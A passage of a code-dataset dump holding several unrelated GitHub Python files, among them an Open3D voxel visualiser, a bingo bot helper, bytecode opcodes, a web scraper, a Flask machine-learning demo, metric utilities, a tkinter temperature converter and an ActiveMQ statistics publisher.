nodes[indexs[1]:].cpu().numpy()\n # nodes0 = nodes[:indexs[1]].cpu().numpy()\n _idx = _idx.cpu().numpy()[0, 200]\n _sampled_idx = _sampled_idx.cpu().numpy()[0, 200]\n\n tmp = 0\n all_points = []\n all_lines = []\n all_colors = []\n # basic_color = [20/255,70/255, 77/255]; highlighted_color = [100/255,140/255, 147/255]\n 
basic_color = [50/255,100/255, 107/255]; highlighted_color = [100/255,140/255, 147/255]\n # basic_color = [80/255,80/255,80/255]; highlighted_color = [120/255,120/255,120/255];\n new_color = [0,0,1]\n for i in range(nodes0.shape[0]):\n node = nodes0[i] # 5.x,y,z,size,b\n # if node[-2] == 1 and node[-1] == 0 and i in _sampled_idx: # batch id ==0 && valid.\n # view all the points for sampled_idx != 0;\n if node[-2] == 1 and node[-1] == 0: # batch id ==0 && valid.\n points = []\n for k in range(-1,3,2):\n for m in range(-1,3,2):\n for n in range(-1,3,2):\n points.append([node[0]+k*node[3]/2, node[1]+m*node[3]/2, node[2]+n*node[3]/2])\n points = np.array(points) # [8,3]\n all_points.append(points)\n lines = np.array([[0,1], [2,3], [4,5], [6,7], [0,4], [1,5],[2,6],[3,7],[0,2],[1,3],[4,6],[5,7]]) + tmp*8 # [12,2]\n all_lines.append(lines)\n tmp +=1\n\n # if i in [_sampled_idx[-1]]: # the intersected voxels\n # all_colors.append(np.stack([np.array(new_color)]* lines.shape[0], axis=0))\n # continue;\n \n if i in range(indexs[1],nodes0.shape[0]):\n all_colors.append(np.stack([np.array(highlighted_color)]* lines.shape[0], axis=0))\n else:\n all_colors.append(np.stack([np.array(basic_color)]* lines.shape[0], axis=0))\n\n all_points = np.concatenate(all_points, axis=0)\n all_lines = np.concatenate(all_lines, axis=0)\n # all_colors = np.array([[0.4,0.4,0.4] for i in range(all_lines.shape[0])])\n all_colors = np.concatenate(all_colors, axis=0)\n # print(all_points.shape, all_lines.shape, all_colors.shape)\n # octree.\n lines_pcd = o3d.geometry.LineSet()\n lines_pcd.lines = o3d.utility.Vector2iVector(all_lines)\n lines_pcd.colors = o3d.utility.Vector3dVector(all_colors)\n lines_pcd.points = o3d.utility.Vector3dVector(all_points)\n # mesh\n mesh = o3d.io.read_triangle_mesh('./mesh_all0.ply', False)\n pcds = o3d.io.read_point_cloud('./pc_all0.ply')\n # pcds = o3d.io.read_triangle_mesh('./realtime_pifu_3571.obj', False)\n # pcds = o3d.io.read_point_cloud('/home/yons/my_Rendering/HumanRendering/depths_input/22_0401_data1_v3_all.ply')\n # pcds = o3d.io.read_point_cloud('/home/yons/my_Rendering/HumanRendering/depths_input/FRAME3587_all.ply')\n\n # draw rays.\n ray_ori = _ray_ori[0, 200, :].cpu().detach().numpy() # [3]\n ray_dir = _ray_dir[0, 200, :].cpu().detach().numpy() # [3]\n ray_len = 3\n ray_end = ray_ori + ray_len * ray_dir\n line_ray = o3d.geometry.LineSet()\n line_ray.lines = o3d.utility.Vector2iVector(np.array([[0,1]]))\n line_ray.colors = o3d.utility.Vector3dVector(np.array([[0.05,0.05,0.05]]))\n line_ray.points = o3d.utility.Vector3dVector(np.stack([ray_ori, ray_end], axis=0))\n\n # draw sampled points, the sampled points.\n sampled_z = sampled_depths[0, 200].cpu().numpy()\n sampled_points = ray_ori[:, None] + ray_dir[:, None] * sampled_z\n sampled_pcds = o3d.geometry.PointCloud()\n sampled_points = o3d.utility.Vector3dVector(sampled_points.T)\n sampled_pcds.points = sampled_points\n \n o3d.visualization.draw_geometries([lines_pcd, line_ray, sampled_pcds, pcds])\n\n # o3d.visualization.draw_geometries([lines_pcd, line_ray, sampled_pcds])\n # vis = o3d.visualization.Visualizer()\n # vis.create_window()\n # render_opt = vis.get_render_option()\n # render_opt.point_size = 0.2\n # render_opt.background_color = np.array([239/255, 244/255, 244/255])\n # # render_opt.background_color = np.array([219/255, 224/255, 244/255])\n # vis.add_geometry(lines_pcd)\n # # vis.add_geometry(pcds)\n # vis.add_geometry(line_ray)\n # vis.add_geometry(sampled_pcds)\n # # o3d.visualization.draw_geometries([lines_pcd, 
pcds])\n # vis.run()\n\n########################## for geometries ########################\n \ndef gen_mesh(opts, model, val_data, device, epoch, use_octree=True):\n # get bbox for generate data.\n bbox_min = np.array( opts.bbox_min ) # [1, 3]\n bbox_max = np.array( opts.bbox_max ) # [1, 3]\n # get the path.\n mesh_dir = os.path.join(opts.model_dir, 'val_results')\n make_dir(mesh_dir)\n geo_save_path = os.path.join(mesh_dir, '{}_epoch{}.obj'.format(val_data['name'][0], epoch))\n \n t0 = time.time()\n with torch.no_grad():\n verts, faces = reconstruction(opts, model, device, opts.num_views, opts.resolution, \n bbox_min, bbox_max, use_octree=use_octree)\n t1 = time.time()\n print( 'Time for predict sdf field: {}'.format(t1 - t0) )\n\n save_obj_mesh(geo_save_path, verts, faces)\n\n\ndef eval_func(opts, model, num_views, points, device):\n points = np.expand_dims(points, axis=0) # [1, 3, N_Points.]\n if not opts.is_train: # especially for the front-face,\n points = np.concatenate([points] * num_views, axis=0) # [N_view * 1, 3, N_points]; {front_view; other 3 views};\n else:\n points = np.concatenate([points] * num_views, axis=0) # [N_view * 1, 3, N_points]; {front_view; other 3 views};\n\n samples = torch.from_numpy(points).to(device=device).float() # [N1, 3, N2].\n model.forward_query_occ(samples) # [[B, 1, N_points] * Stages.] -> [1, N_points]\n pred = model._predicted_occ[0] # select the first one.\n return pred.detach().cpu().numpy()\n \n\ndef reconstruction(opts, model, device, num_views, resolution, bbox_min, bbox_max, \n use_octree=True, num_sample_batch=10000): \n coords, mat = create_grids(resolution, bbox_min, bbox_max)\n res_XYZ = (resolution, resolution, resolution)\n if use_octree:\n sdf = eval_grid_octree(opts, model, device, num_views, coords, eval_func, num_samples=num_sample_batch)\n else:\n raise(\"no support.\")\n \n verts, faces = mcubes.marching_cubes(sdf, 0.5)\n verts = np.matmul(mat[:3, :3], verts.T) + mat[:3, 3:4]\n verts = verts.T\n return verts, faces\n\n","repo_name":"zdlarr/SAILOR","sub_path":"utils_render/utils_render.py","file_name":"utils_render.py","file_ext":"py","file_size_in_byte":43904,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"71420336252","text":"from CardListFactory import bingoCardList\nimport ListFactory as b\nimport XMLCardList\n\nimport random\n\n\ndef bingoItemRemoved(bingoItemsRemoved):\n \"\"\"Code to run to amend cards if a bingo item is removed with the list remove or list replace command.\n bingoItemsRemoved is a list of indexes.\"\"\"\n usersChangedList = []\n\n # make a copy of the list to select the replacement bingo item from, which excludes the items already selected\n # for the card\n tempABListCtrl = b.bingoList[:]\n\n # removing the killed items from the pool of potential replacement items\n for ab in b.bingoList:\n for bi in bingoItemsRemoved:\n if bi == ab.index:\n try:\n tempABListCtrl.remove(ab)\n except:\n print(\"Could not remove item bi.\" + str(bi) + \" \" + str(ab.index))\n\n # remove the items already on a card from the pool for that card, so there aren't duplicates\n for card in bingoCardList:\n\n itemsToChangeList = []\n tempABList = tempABListCtrl[:]\n\n for selItem in card.bingoItemList:\n\n for itemRemoved in bingoItemsRemoved: # find all changed items on this card\n if itemRemoved == selItem.index:\n itemsToChangeList.append(itemRemoved)\n\n if len(itemsToChangeList) != 0: # if there are changed items on the card\n usersChangedList.append(card.userName)\n 
card.cardChanged = True\n\n for cardItem in card.bingoItemList:\n for ab in b.bingoList: # removing the items on the card from the pool of new items\n if ab.index == cardItem.index:\n try:\n tempABList.remove(ab)\n except:\n pass\n continue\n\n replaceList = random.sample(tempABList, len(itemsToChangeList)) # select the replacement bingoItems\n\n n = 0\n for itemToChange in itemsToChangeList: # apply changes to card\n\n for cardItem in card.bingoItemList:\n if itemToChange == cardItem.index:\n replaceIndex = card.bingoItemList.index(cardItem)\n card.bingoItemList.remove(cardItem)\n card.bingoItemList.insert(replaceIndex, replaceList[n])\n n += 1\n break\n\n if len(usersChangedList) == 0:\n usersChangedList.append(\"None\")\n else:\n XMLCardList.writeList()\n\n usersChangedString = \", \".join(usersChangedList)\n\n return usersChangedString\n","repo_name":"Kenny-Dave/Discord-BingoBot","sub_path":"ListItemRemoved.py","file_name":"ListItemRemoved.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38168256024","text":"\nLOAD_CONST = 1\nBINARY_NEQ = 2\nPRINT = 3\nBINARY_EQ = 4\nRETURN = 5\nSTORE_VARIABLE = 6\nLOAD_VARIABLE = 7\n\nJUMP = 8\nJUMP_IF_NOT_ZERO = 9\nJUMP_IF_ZERO = 10\n\nBINARY_ADD = 11\nBINARY_SUB = 12\nBINARY_LT = 13\nBINARY_LTE = 14\nBINARY_GT = 15\nBINARY_GTE = 16\nBINARY_AND = 17\nBINARY_OR = 18\nNOT = 19\nBINARY_MUL = 20\nBINARY_DIV = 21\nSTORE_ARRAY = 22\nSTORE_DICT = 23\nINDEX = 50\nCALL = 90\n\nNO_ARG = -255\n\n\nreverse = {\n 1: \"LOAD_CONST\",\n 2: \"BINARY_NEQ\",\n 3: \"PRINT\",\n 4: \"BINARY_EQ\",\n 5: \"RETURN\",\n 6: \"STORE_VARIABLE\",\n 7: \"LOAD_VARIABLE\",\n 8: \"JUMP\",\n 9: \"JUMP_IF_NOT_ZERO\",\n 10: \"JUMP_IF_ZERO\",\n 11: \"BINARY_ADD\",\n 12: \"BINARY_SUB\",\n 13: \"BINARY_LT\",\n 14: \"BINARY_LTE\",\n 15: \"BINARY_GT\",\n 16: \"BINARY_GTE\",\n 17: \"BINARY_AND\",\n 18: \"BINARY_OR\",\n 19: \"NOT\",\n 20: \"BINARY_MUL\",\n 21: \"BINARY_DIV\",\n 22: \"STORE_ARRAY\",\n 23: \"STORE_DICT\",\n 50: \"INDEX\",\n 90: \"CALL\",\n 0: \"NO_ARG\"\n}\n\nclass Bytecode(object):\n \"\"\"Also plundered from Cycy\"\"\"\n \n def __init__(self, instructions, arguments, constants, variables, name):\n self.instructions = instructions\n self.name = name\n self.arguments = arguments or []\n self.constants = constants\n self.variables = variables\n\n def __iter__(self):\n \"\"\"Yield (offset, byte_code, arg) tuples.\n The `byte_code` will be one of the constants defined above,\n and `arg` may be None. 
`byte_code` and `arg` will be ints.\n \"\"\"\n offset = 0\n while offset < len(self.instructions):\n byte_code, arg = self.instructions[offset]\n \n yield (offset, byte_code, arg)\n offset += 1\n\n def to_string(self):\n return 'bytecode'\n\n def dump(self, pretty=True, indent=0):\n lines = []\n lines.append(\"CONSTANTS:\")\n for i, v in enumerate(self.constants):\n lines.append(\"%s: %s\" % (i, v.to_string()))\n \n lines.append(\"VARS:\")\n for k, v in self.variables.iteritems():\n lines.append(\"%s: %s => %s\" % (k, v.name, v.value.__class__.__name__))\n \n \n lines.append(\"CODE:\")\n \n for offset, byte_code, arg in self:\n\n name = reverse[byte_code]\n\n str_arg = \"\"\n if arg != NO_ARG:\n str_arg = \"%s\" % arg\n\n line = \"%s%s %s %s\" % (' ' * indent, str(offset), name, str_arg)\n if pretty:\n if byte_code == LOAD_CONST:\n line += \" => \" + self.constants[arg].dump()\n elif byte_code == CALL:\n line += \" => \\n\" + self.variables[arg].value.dump()\n \n elif byte_code == RETURN:\n if arg:\n line += \" (top of stack)\"\n else:\n line += \" (void return)\"\n lines.append(line.strip())\n\n return \"\\n\".join(lines)\n\n","repo_name":"joshsharp/python-braid","sub_path":"bytecode.py","file_name":"bytecode.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"29779294720","text":"import urllib.request #导入urllib.request包\r\nimport requests #导入requests包.此包是用Python语言编写,基于urllib,采用Apache2 Licensed开源协议的HTTP库.它比 urllib 更加方便,可以节约我们大量的工作.\r\nfrom bs4 import BeautifulSoup\r\nimport xlwt #导入Excel包\r\nmingc=[]#建立存储网站名称的空列表\r\npaim=[]#建立存储网站周排名的空列表\r\ndefen=[]#建立存储网站得分的空列表\r\nzhqt=[]#建立存储网站周排名以及与其同节点数据的空列表\r\njies=[]#建立存储网站介绍的空列表\r\n\r\nr=requests.get('http://top.chinaz.com/hangye/index_jiaotonglvyou_lvyou.html')#获取网站('http://top.chinaz.com/hangye/index_jiaotonglvyou_lvyou.html')的源代码到r\r\nif r.status_code==200: #确保读取源代码正常\r\n r.encoding = 'utf-8'#将文本编码格式定为utf-8 ,便于读取\r\n html=r.text #将代码改为text格式存入html\r\n soup = BeautifulSoup(html,\"html.parser\")#将html用BeautifulSoup转化后存入soup\r\n #从文档中找到所有标签(网站名称)的链接: \r\n for link in soup.find_all('h3',class_=\"rightTxtHead\"):\r\n mingc.append(link.get_text())#向对应列表中添加网站名称\r\n #从文档中找到所有标签(网站周排名以及与其同节点数据)的链接: \r\n for link in soup.find_all('p',class_=\"RtCData\"):\r\n zhqt.append(link.get_text())#向对应列表中添加网站周排名以及与其同节点数据\r\n #从文档中找到所有标签(网站得分)的链接: \r\n for link in soup.find_all('div',class_=\"RtCRateCent\"):\r\n defen.append(link.get_text()[5:])#向对应列表中添加网站得分\r\n #从文档中找到所有标签(网站介绍)的链接: \r\n for link in soup.find_all('p',class_=\"RtCInfo\"):\r\n jies.append(link.get_text()[5:])#向对应列表中添加网站介绍\r\n \r\ni=0#确保列表内容从0开始转换\r\nwhile i<30:#确保转换的列表内容不为空\r\n j=i*4\r\n paim.append(zhqt[j][9:])#清除与周排名相同节点的无用数据,向周排名列表中添加周排名\r\n i=i+1#确保列表内序号依次增加\r\n \r\ni=0#确保列表内容从0开始打印\r\nwhile i<30:#确保打印列表内容不为空\r\n print()#打印换行\r\n print(i+1)#打印网站序号\r\n print(mingc[i])#打印网站名称\r\n print(\" 周排名:\"+paim[i])#打印网站周排名\r\n print(\" 网站得分:\"+defen[i])#打印网站得分\r\n print(\" 网站介绍:\"+jies[i])#打印网站介绍\r\n i=i+1#确保列表内序号依次增加\r\n \r\nexcelTabel= xlwt.Workbook()#创建excel对象\r\nsheet1=excelTabel.add_sheet('wangzhang',cell_overwrite_ok=True)#在创建的Excel表格中创建名为'wangzhang'的工作空间\r\nsheet1.write(0,0,'网站名称')#向Excel表格A1框中输入标题“网站名称”\r\nsheet1.write(0,1,'周排名')#向Excel表格B1框中输入标题“周排名”\r\nsheet1.write(0,2,'网站得分')#向Excel表格C1框中输入标题“网站得分”\r\nsheet1.write(0,3,'网站介绍')#向Excel表格D1框中输入标题“网站介绍”\r\n\r\ni=0#确保列表内容从0开始输入表格\r\nt=1#确保Excel表格中框从第二行开始\r\nwhile t<31: #确保输入Excel表格框中的列表内容不为空\r\n sheet1.write(t,0,mingc[i])#向Excel表格与A1同列的框中依次输入各网站名称\r\n 
sheet1.write(t,1,paim[i])#向Excel表格与B1同列的框中依次输入各网站周排名\r\n sheet1.write(t,2,defen[i])#向Excel表格与C1同列的框中依次输入各网站得分\r\n sheet1.write(t,3,jies[i])#向Excel表格与D1同列的框中依次输入各网���介绍\r\n i=i+1#确保列表内序号依次增加\r\n t=t+1#跳转Excel表行数\r\nexcelTabel.save('wangzhang.xlsx')#保存名为'wangzhang.xlsx'的Excel表格\r\n","repo_name":"siyiaoyou/pachong--","sub_path":"pachong (旅游网站爬取分析).py","file_name":"pachong (旅游网站爬取分析).py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14474706373","text":"from flask import Flask, render_template, request\nfrom flask import current_app\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.cluster import KMeans\nfrom bp_modue.module import module_bp\nfrom datetime import datetime\nimport os, joblib\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt \n\napp = Flask(__name__)\napp.register_blueprint(module_bp, url_prefix='/module')\n\n@app.route('/')\ndef index():\n menu = {'ho':1, 'm1':0, 'm2':0, 'm3':0, 'cf':0, 'cu':0}\n return render_template('index.html', menu=menu)\n\n@app.route('/menu1', methods=['GET', 'POST'])\ndef menu1():\n menu = {'ho':0, 'm1':1, 'm2':0, 'm3':0, 'cf':0, 'cu':0}\n if request.method == 'GET':\n return render_template('menu1.html', menu=menu)\n else:\n text = request.form['text']\n review = request.form['review'].replace('\\n','
')\n lang = request.form['lang']\n return render_template('menu1_res.html', menu=menu,\n text=text, review=review, lang=lang)\n\n@app.route('/menu2')\ndef menu2():\n menu = {'ho':0, 'm1':0, 'm2':1, 'm3':0, 'cf':0, 'cu':0}\n items = [\n {'id':1001, 'title':'HTML', 'content':'HTML is HyperText ...'},\n {'id':1002, 'title':'CSS', 'content':'CSS is Cascading ...'},\n {'id':1003, 'title':'JS', 'content':'JS is Javascript ...'},\n ]\n now = datetime.now()\n np.random.seed(now.microsecond)\n X = np.random.rand(100)\n Y = np.random.rand(100)\n plt.figure()\n plt.scatter(X, Y)\n img_file = os.path.join(current_app.root_path, 'static/img/menu2.png')\n plt.savefig(img_file)\n mtime = int(os.stat(img_file).st_mtime)\n\n return render_template('menu2.html', menu=menu, mtime=mtime,\n now=now.strftime('%Y-%m-%d %H:%M:%S.%f'), items=items)\n\n@app.route('/classify', methods=['GET', 'POST'])\ndef classify():\n menu = {'ho':0, 'm1':0, 'm2':0, 'm3':0, 'cf':1, 'cu':0}\n if request.method == 'GET':\n return render_template('classify.html', menu=menu)\n else:\n index = int(request.form['index'] or '0')\n df = pd.read_csv('static/data/titanic_test.csv')\n scaler = joblib.load('static/model/titanic_scaler.pkl')\n test_data = df.iloc[index, :-1].values.reshape(1,-1)\n test_scaled = scaler.transform(test_data)\n label = df.iloc[index, 0]\n lrc = joblib.load('static/model/titanic_lr.pkl')\n svc = joblib.load('static/model/titanic_sv.pkl')\n rfc = joblib.load('static/model/titanic_rf.pkl')\n pred_lr = lrc.predict(test_scaled)\n pred_sv = svc.predict(test_scaled)\n pred_rf = rfc.predict(test_scaled)\n result = {'index':index, 'label':label,\n 'pred_lr':pred_lr[0], 'pred_sv':pred_sv[0], 'pred_rf':pred_rf[0]}\n\n tmp = df.iloc[index, 1:].values\n value_list = []\n int_index_list = [0, 1, 3, 4, 6, 7]\n for i in range(8):\n if i in int_index_list:\n value_list.append(int(tmp[i]))\n else:\n value_list.append(tmp[i])\n org = dict(zip(df.columns[1:], value_list))\n return render_template('classify_res.html', menu=menu, res=result, org=org)\n\n@app.route('/cluster', methods=['GET', 'POST'])\ndef cluster():\n menu = {'ho':0, 'm1':0, 'm2':0, 'm3':0, 'cf':0, 'cu':1}\n if request.method == 'GET':\n return render_template('cluster.html', menu=menu)\n else:\n k_number = int(request.form['k_number'])\n option = request.form['option']\n if option == 'direct':\n f_csv = request.files['csv']\n file_csv = os.path.join(current_app.root_path, 'static/upload/') + f_csv.filename\n f_csv.save(file_csv)\n print(f\"{k_number}, {f_csv}, {file_csv}\")\n else:\n file_csv = os.path.join(current_app.root_path, 'static/clus_pca_data/') + option + '.csv'\n\n df_csv = pd.read_csv(file_csv)\n # 전처리 - 정규화\n X_scaled = StandardScaler().fit_transform(df_csv.iloc[:, :-1])\n\n # 차원 축소(PCA)\n pca_array = PCA(n_components=2).fit_transform(X_scaled)\n df = pd.DataFrame(pca_array, columns=['pca_x', 'pca_y'])\n df['target'] = df_csv.iloc[:, -1].values\n\n # K-Means Clustering\n kmeans = KMeans(n_clusters=k_number, init='k-means++', max_iter=300, random_state=2022)\n kmeans.fit(X_scaled)\n df['cluster'] = kmeans.labels_\n\n # 시각화\n markers = ['s', 'o', '^', 'P', 'D', 'H', 'x']\n plt.figure()\n for i in df.target.unique():\n marker = markers[i]\n x_axis_data = df[df.target == i]['pca_x']\n y_axis_data = df[df.target == i]['pca_y']\n plt.scatter(x_axis_data, y_axis_data, marker=marker)\n plt.title('Original Data', fontsize=15)\n plt.xlabel('PCA 1'); plt.ylabel('PCA 2')\n img_file = os.path.join(current_app.root_path, 'static/img/cluster0.png')\n 
plt.savefig(img_file)\n\n plt.figure()\n for i in range(k_number):\n marker = markers[i]\n x_axis_data = df[df.cluster == i]['pca_x']\n y_axis_data = df[df.cluster == i]['pca_y']\n plt.scatter(x_axis_data, y_axis_data, marker=marker)\n plt.xlabel('PCA 1'); plt.ylabel('PCA 2')\n plt.title(f'{k_number} Clustering Result', fontsize=15)\n img_file = os.path.join(current_app.root_path, 'static/img/cluster1.png')\n plt.savefig(img_file)\n\n mtime = int(os.stat(img_file).st_mtime)\n return render_template('cluster_res.html', menu=menu, k_number=k_number, mtime=mtime)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n","repo_name":"Jinimo/Flask_web_","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72055858171","text":"from sklearn.metrics import auc, roc_curve\nimport numpy as np\nimport torch\n\ndef auc_acc(pred, true):\n sigma = 1e-6\n true = true.astype(int)\n pred = pred + np.random.rand(*pred.shape) * sigma\n auc_list = []\n if pred.shape[0] != true.shape[0]:\n for iter1 in range(pred.shape[0]):\n id = pred[iter1].argsort()\n for iter2 in range(true.shape[0]):\n fpr, tpr, thresholds = roc_curve(true[iter2][id], pred[iter1][id], pos_label=1)\n auc_list.append(auc(fpr, tpr))\n else:\n for iter1 in range(pred.shape[0]):\n id = pred[iter1].argsort()\n fpr, tpr, thresholds = roc_curve(true[iter1][id], pred[iter1][id], pos_label=1)\n auc_list.append(auc(fpr, tpr))\n return np.mean(np.array(auc_list))\n\n\ndef KL_Divengence(P, Q, multi_state=False, log=torch.log2):\n if multi_state:\n P /= P.sum(-1, keepdims=True)\n Q /= Q.sum(-1, keepdims=True)\n out = (P * (log(P) - log(Q))).sum(-1)\n else:\n out = P * (log(P) - log(Q)) + (1 - P) * (log(1 - P) - log(1 - Q))\n return out\n\ndef JS_Divengence(P, Q, multi_state=False):\n M = (P + Q) / 2\n return (KL_Divengence(P, M, multi_state=False) + KL_Divengence(Q, M, multi_state=False)) / 2\n\n\ndef CrossEntropy(pred, true, multi_state=True, sigma=1e-8):\n assert((pred.max() <= 1) and (pred.min() >= 0))\n assert((true.max() <= 1) and (true.min() >= 0))\n true = true.clamp(sigma, 1-sigma)\n pred = pred.clamp(sigma, 1-sigma)\n if not multi_state:\n return (- true * torch.log(pred) - (1 - true) * torch.log(1 - pred))\n else:\n return (- true * torch.log(pred)).sum(-1)\n\n\ndef EffectiveInformation(\n pred, true, multi_state=False, sigma=1e-10, dtype=None): # input: [number of samples, number of vertices]\n \n assert((pred.max() <= 1) and (pred.min() >= 0))\n assert((true.max() <= 1) and (true.min() >= 0))\n pred = pred.float().clamp(sigma, 1-sigma)\n true = true.float().clamp(sigma, 1-sigma)\n \n if multi_state:\n mean = true.clone()\n for iter in range(len(true.shape)-1):\n mean = mean.mean(iter, keepdims=True)\n temp1, temp2 = KL_Divengence(mean, true, multi_state=True).mean(), KL_Divengence(pred, true, multi_state=True).mean()\n else:\n mean = true * 0.0 + true.mean()\n #pred /= pred.sum(-1, keepdim=True)\n #true /= true.sum(-1, keepdim=True)\n #mean /= mean.sum(-1, keepdim=True)\n temp1, temp2 = KL_Divengence(mean, true, multi_state=False).mean(), KL_Divengence(pred, true, multi_state=False).mean()\n #print(temp1)\n #print(temp2)\n if dtype:\n temp1, temp2 = dtype(temp1), dtype(temp2)\n return temp1, temp2, temp1 - temp2 # [Mean:True, Pred:True, Mean:True-Pred:True]\n\ndef CorrelationCoefficient(pred, true, dtype=None, sigma=1e-12):\n x = pred.float()\n y = true.float()\n\n vx = x - x.mean(dim=-1, 
keepdims=True)\n vy = y - y.mean(dim=-1, keepdims=True)\n\n corr = torch.sum(vx * vy, dim=-1, keepdims=True) / ((torch.sqrt(torch.sum(vx ** 2, dim=-1, keepdims=True)) * torch.sqrt(torch.sum(vy ** 2, dim=-1, keepdims=True))) + sigma)\n return corr","repo_name":"tsinghua-fib-lab/MSDNet","sub_path":"generate_dataset/simulate_illness_spread/util/Criteria.py","file_name":"Criteria.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71021493373","text":"# f = c * 1.8 + 32\r\n\r\nimport tkinter as tk\r\n\r\npencere = tk.Tk()\r\npencere.title(\"🌡️Sıcaklık Dönüşümü(C/F)♨️☀️\")\r\npencere.geometry(\"330x250+650+250\")\r\npencere.config(bg=\"#666666\")\r\npencere.resizable(False,False)\r\n\r\npencere_icon = tk.PhotoImage(file=\"images/sicaklikTermometre.png\")\r\npencere.iconphoto(False,pencere_icon)\r\n\r\ndef pencereyi_kapat():\r\n pencere.destroy()\r\n\r\ndef cevir():\r\n \r\n c = int(e1.get())\r\n f = c * 1.8 + 32\r\n label4.config(text=f)\r\n e1.delete(0,\"end\")\r\n\r\nlabel1 = tk.Label(pencere,\r\n text=\"Sıcaklık Dönüşümü\",\r\n fg=\"white\",\r\n bg=\"black\",\r\n font=(\"Arial 15 bold\")\r\n )\r\nlabel1.pack()\r\n\r\nlabel2 = tk.Label(pencere,\r\n text=\"Sıcaklık Değerini Giriniz(C): \",\r\n fg=\"white\",\r\n bg=\"#666666\",\r\n font=(\"Arial 15 bold\")\r\n )\r\nlabel2.pack()\r\n\r\ne1 = tk.Entry(pencere,\r\n font=(\"arial 15\"),\r\n fg=\"red\",\r\n bg=\"cyan\")\r\ne1.pack()\r\ne1.focus()\r\n\r\ncevir_buton = tk.Button(pencere,\r\n text=\"Çevir(C/F)\",\r\n font=(\"arial 10\"),\r\n fg=\"white\",\r\n bg=\"#666666\",\r\n width=10,\r\n command=cevir)\r\ncevir_buton.pack(pady=5)\r\n\r\nlabel3 = tk.Label(pencere,\r\n text=\"Sıcaklık Değeri(F)\",\r\n font=(\"arial 10 bold\"),\r\n fg=\"white\",\r\n bg=\"#666666\")\r\nlabel3.pack()\r\n\r\nlabel4 = tk.Label(pencere,\r\n text=\"...........\",\r\n font=(\"arial 10 bold\"),\r\n fg=\"lime\",\r\n bg=\"#666666\")\r\nlabel4.pack()\r\n\r\nkapat_buton = tk.Button(pencere,\r\n text=\"Kapat\",\r\n font=(\"arial 10\"),\r\n fg=\"white\",\r\n bg=\"#666666\",\r\n width=10,\r\n command=pencereyi_kapat)\r\nkapat_buton.pack(pady=5)\r\npencere.mainloop()","repo_name":"erhan3861/python_tkinter_projects","sub_path":"sicaklikcevirici1.py","file_name":"sicaklikcevirici1.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24738998622","text":"import numpy as np\nimport scipy.stats\nimport pickle\nimport zlib\nimport os\nimport time # processing performance\nimport pyarrow.parquet as pq # read parquet\nfrom tqdm import tqdm\nimport stomp\n\n\n# Loop through generator obj 제너레이터 반복을 통한 기술 통계량 계산\ndef slice_generator(time_range):\n list = range(time_range) # 범위만 담고 있음\n for y in tqdm(list): # 범위 만큼 반복\n yield y # 반복 할 것 반환\n\n\n# 기술 통계 계산\ndef statistic_calc(batch_df):\n statistic = batch_df.groupby('100ms').agg(\n [np.mean, min, max, np.median, np.var, scipy.stats.skew, scipy.stats.kurtosis])\n statistic = statistic.stack(level=0).reset_index() # 건희는 이게 편해, 채널이 column 으로\n return statistic\n\n\n# 전송 방법에 따른 함수 구현\ndef json_pub(df):\n res = df.to_json(orient='records', double_precision=15)\n return res\n\n\ndef byte_pub(df):\n res = zlib.compress(pickle.dumps(df))\n return res\n\n\ndef zlib_pub(df):\n res = zlib.compress(df.to_json(orient='records', double_precision=15))\n return res\n\n\ndef pickle_pub(df):\n res = pickle.dumps(df)\n return res\n\n\n# 실험 
변수\nparquet_file_path = \"../dataset.parquet\"\n\n# active MQ 서버 정보 선언\nuser = os.getenv(\"ACTIVEMQ_USER\") or \"admin\"\npassword = os.getenv(\"ACTIVEMQ_PASSWORD\") or \"password\"\nhost = os.getenv(\"ACTIVEMQ_HOST\") or \"114.70.212.154\"\nport = os.getenv(\"ACTIVEMQ_PORT\") or 61613\ndestination = \"/topic/parquet\" # 토픽 세팅\n\n# make connection to activeMQ Server\nconn = stomp.Connection(host_and_ports=[(host, port)])\nconn.connect(login=user, passcode=password)\n\n# DataFrame 형태로 변환\ntable = pq.read_table(parquet_file_path)\ndataset = table.to_pandas()\n\n# 기술 통계량 계산 시 그룹화 시킬 millisecond 열 추가\ndataset[\"100ms\"] = (dataset[\"Timestamp\"]*10).apply(int) # 기숱롱계량 구하기 위함\ndataset = dataset.drop(\"Timestamp\", axis=1)\n\n# 전송: 본 데이터(100ms 열을 바탕으로 0.1초 분량씩 전송)\n# * 100ms 배치의 총 개수 계산 후 그만큼 반복하는 제너레이터 생성\ndf_start_sec = dataset.loc[0, ['100ms']][0]//10\ndf_end_sec = dataset.loc[len(dataset) - 1, ['100ms']][0]//10\ngeneratorObj = slice_generator(int(df_end_sec - df_start_sec))\n\n# 500 초짜리 기술통계 데이터 만들기\nstatistic_df_ls = []\nfor i in generatorObj:\n calc = statistic_calc(dataset.loc[dataset['100ms'] // 10 == df_start_sec + i])\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n statistic_df_ls.append(calc)\n\nprint(len(statistic_df_ls))\n\n# 시작 입력\ninput(\"반드시 subscriber 먼저 실행시켜주세요 > 확인:엔터\")\n\n# 시간 측정\nstart = time.time() # 시간 측정\n\n# 1초 데이터마다 보내기. 기술 통계량은 0.1초마다 구함\nfor i in range(len(statistic_df_ls)):\n # Serialize and Publish\n transferSlice = json_pub(statistic_df_ls[i])\n conn.send(destination, transferSlice, persistent='false')\n\n# 